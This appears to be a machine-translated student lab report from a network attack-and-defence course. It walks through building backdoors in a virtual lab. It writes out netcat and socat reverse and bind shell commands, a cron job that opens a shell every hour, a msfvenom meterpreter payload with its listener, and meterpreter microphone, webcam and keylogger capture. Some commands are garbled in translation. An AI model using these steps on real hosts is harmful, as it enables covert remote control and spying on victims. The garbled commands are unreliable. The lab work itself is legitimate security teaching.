20,174,315 Huang Huajian "network technology against" back door Principles and Practice Exp2

Others 2020-03-22 13:39:48 views: null

Experiment 1 goal

1.1 test requirements

  • Nc achieved using the back door between the win, mac, Linux connection
  • meterpreter applications
  • MSF POST application module

1.2 Experimental content

  1. Use netcat get the host operating Shell , cron start.
  2. Use socat get the host operating Shell, plans to start the task.
  3. Use MSF meterpreter (or other software) to generate an executable file, use ncat or socat to the host and run to get the host Shell.
  4. Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right.
  5. MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition recall connection Shell.

Third, the experimental procedures and results

  (A) ncat

netcat is a bottom tool, the basic TCP, UDP data transmitting and receiving. Use is often combined with other tools, play the role of the back door. Linux usually comes with netcat, "man netcat" or "man nc" to see the instructions for its use.

 

  Windows install ncat, download ncat.rar decompression can be used in the course home page annex. Here we must extract to the D drive.

    1.Win get Linux Shell

    First look at the windows client's IP address (ipconfig).

 

 

Once you have downloaded netcat in the windows, switch to the file directory, open the monitor with ncat.exe -l -p 4315 command.

 

 

 Next, open Kali, with NC 4315 192.168.1.49  -e / bin / SH connection instruction to rebound.

After a while opened with ncat.exe -l -p 4320 command in Windows, Linux discovery has received the shell, you can run any command. (Here I use as an example ls)

 

 

 

 

2.1.2 Linux get Win Shell

Now that our windows can get the Linux shell, of course converse is also true.

First of all, we need to know the IP address of the virtual machine, use ipconfig to see here

 

 

In the end run Linux interception instruction  nc  the -l  -p 4315, then rebounded be connected to the Windows  ncat.exe -e cmd.exe 192.168.54.128 4315.

As a result, Linux gained the windows of the shell.

You can see the command-line interface, you can execute windows commands (I use the ipconfig is an example)

 

 

 

2.1.3 nc data transmission

windows running the Listener command

 

 

 linux establish a connection with windows;

After the connection is established, you can transfer the character data

 

 

 

2.2 Meter Preter

Meterpreter is used to generate a backdoor platform, with powerful features, especially its socks proxy, simply within the network penetration testing artifact.

Is a backdoor program.

The traditional understanding is: someone to write a backdoor, we make use of them.

Later, some cattle do, wanted to write a platform to generate backdoors. This platform does, the basic functions of the back door, extensions, encoding, operating platform and operating parameters, all made of parts or adjustable parameters. When used in combination as needed, you can generate an executable file.

Typical platform will include:

  • intersect
  • Metaspolit of msfvenom instructions
  • Veil-evasion

Task One: Use netcat get the host operating Shell, cron start

Cron is timed tasks under Linux, every minute running time, preset instruction is executed according to the configuration file.

1. Turn on the monitor in the windows, using ncat.exe -l 4315 command monitor 4315port

2.crontab instruction to add a scheduled task, "- e" indicates editing. 3 and select Edit, Insert 10 * * * * / bin / netcat 192.168.1.156 4315 -e / bin / sh in the bottom row, i.e., the reverse connection to the host in the first 10 minutes of every hour 4315port. 

 3. Save, exit configuration takes effect. Through "crontab -l" to see, "- l" represents the list. After 10 minutes instruction execution, it can be found has been obtained shell.

 

 

 

Task Two: Use socat get the host operating Shell, plans to start the task

1. Zhang Bo classmates sent me socat archive download and extract good.

2. In Windows, open the Control Panel -> System and Security -> Administrative Tools to find the Task Scheduler, click Create task.

 

 

 

3. Click the Triggers tab, select New, and then will start the task set to lock the workstation.

 

 

 4. In the Actions tab, click New, select socat.exe file "program or script" in the path, add parameters to fill tcp-listen: 4315 exec: the role of cmd.exe, pty, stderr, this order is to cmd.exe bound to port 4315, while the cmd.exe is redirected to stderr stdout;

 

 

 5. Once created, type windows + L to lock the computer to log on again, so that the task started. Click on Task Scheduler Library, I can see this being named the 4315 program is running.

 

 

 6. Then in the input command socat -tcp Kali environment: 192.168.1.156: 4320, cmd has been obtained can be found in the shell, see the command line interface (used to verify ipconfig).

 

 

 

Task 3: Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell

1. Generate 4320_backdoor.exe, copied to Win.

Kali enter the command as follows (since the rear door is generated in Linux, so here is Kali ip address ip address) following ip address Kali

 

 

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1=4315 -f exe > 4315_backdoor.exe

 

 

 

 

 

 

2. Perform ncat.exe -l 4315> 4315_backdoor.exe Under Windows, the accused entered the host to receive the file mode.

3. Perform nc 192.168.1.49 4315 <4315_backdoor.exe in kali, the backdoor generated is transferred to the host.

4.MSF open listening processes.

Kali reopen a terminal, input msfconsoleinto the console msf

In turn enter:

  • use exploit/multi/handler // use the monitor module, set the payload

  • set payload windows/meterpreter/reverse_tcp // Use the same time generating a payload backdoor

  • set LHOST 192.168.171.128

  • set LPORT 4320

  • exploit // setup is complete, start listening

  •  

     

     

Task 4: Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right;

    1. Audio

    Task Three to maintain the status of an audio input record_mic can intercept.

 

 

 

 

 

 

2, camera

Enter the command webcam_snap use the camera to take pictures.

 

 

 

3, keystroke recording

Use keyscan_start instructions recorded keystrokes process keyscan_dump instruction fetch record keystroke

 

3 Experimental Thinking and Experience

3.1 basic questions answered

( 1) include a back door you can think of possible ways to enter your system?

Visit the website accompanying software, or in the informal site to download software download

(2) How do you know exemplified by the back door to start up ( win and linux) way?

windows: from the start. linux: Enter the shellcode. 

Which gives you a profound image function (3) Meterpreter there?

By backlinks, you get all the rights to perform the operation host shell executable file containing the back door, resulting in the user's password, the remote host upload and download files, run cmd.exe, capture screen, get a remote control, capture key information and many more.

(4) How to find yourself the system has not been installed back door?

Check boot from the start, whether there are suspicious programs in Task Scheduler; install specialized anti-virus software, real-time protection; see the local port to determine whether there is an exception for open ports and so on.

2, the experimental experience

This very interesting experiment, by learning teacher tutorials, and sister school seniors blog, basically able to complete the experiment. In this experiment, I learned the basic principles of host injection attacks exploit backdoor, learned how to use netcat, socat, meterpreter, etc., although the content is simple, but I have a basic understanding of the back door. In the next study, I will further study the various theories of knowledge back door.

This experiment made me a better understanding of some of the means of network attacks, enhance network security awareness.

2, the experimental problems encountered

Question 1: kali no networking

 

 

After starting after Kali, somehow found even without Internet access, through exchanges with classmates to get a solution, under his guidance finally restore the default settings through the Virtual Network Editor beginning of the experiment, restart KALI successfully connect to the Internet.

Question 2: Use multiple programs lead to failure

 

 

 Solution: The easiest push to redo Behind his .JPG.

 

 Question 3: kali not equipped socat

 

 I shared folders do not know how the impossible, and found the Internet to find their own situation is also inconsistent.

Final Solution: socat archive into my mailbox, and then log-mail download kali Sohu browser (soil solution, Behind his .jpg)

 

Guess you like

Origin www.cnblogs.com/hhj20174315/p/12544448.html
Recommended
Ranking
Solve the problem that the Chinese display of the drawing using python matplotlib under the Linux system is displayed as a box
[Conference Call for Papers] The 5th International Conference on Civil Engineering, Environmental Resources and Energy Materials (CCESEM 2023)
4-yl Fast Fourier Transform
DataGirdView interlaced display color
[Docker implements test deployment CI/CD----Dingding alarm after the build is successful (7)]
[Asp.net core series] 6 the complete structure of a project in actual combat
The new version of OpenCenterV3 management background
Why can box plots detect outliers and what is the principle?
[Switch] jumbo frame Introduction
C++对象移动(3)——移动构造函数
Daily
More
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)

Code World

© 2018 codetd.com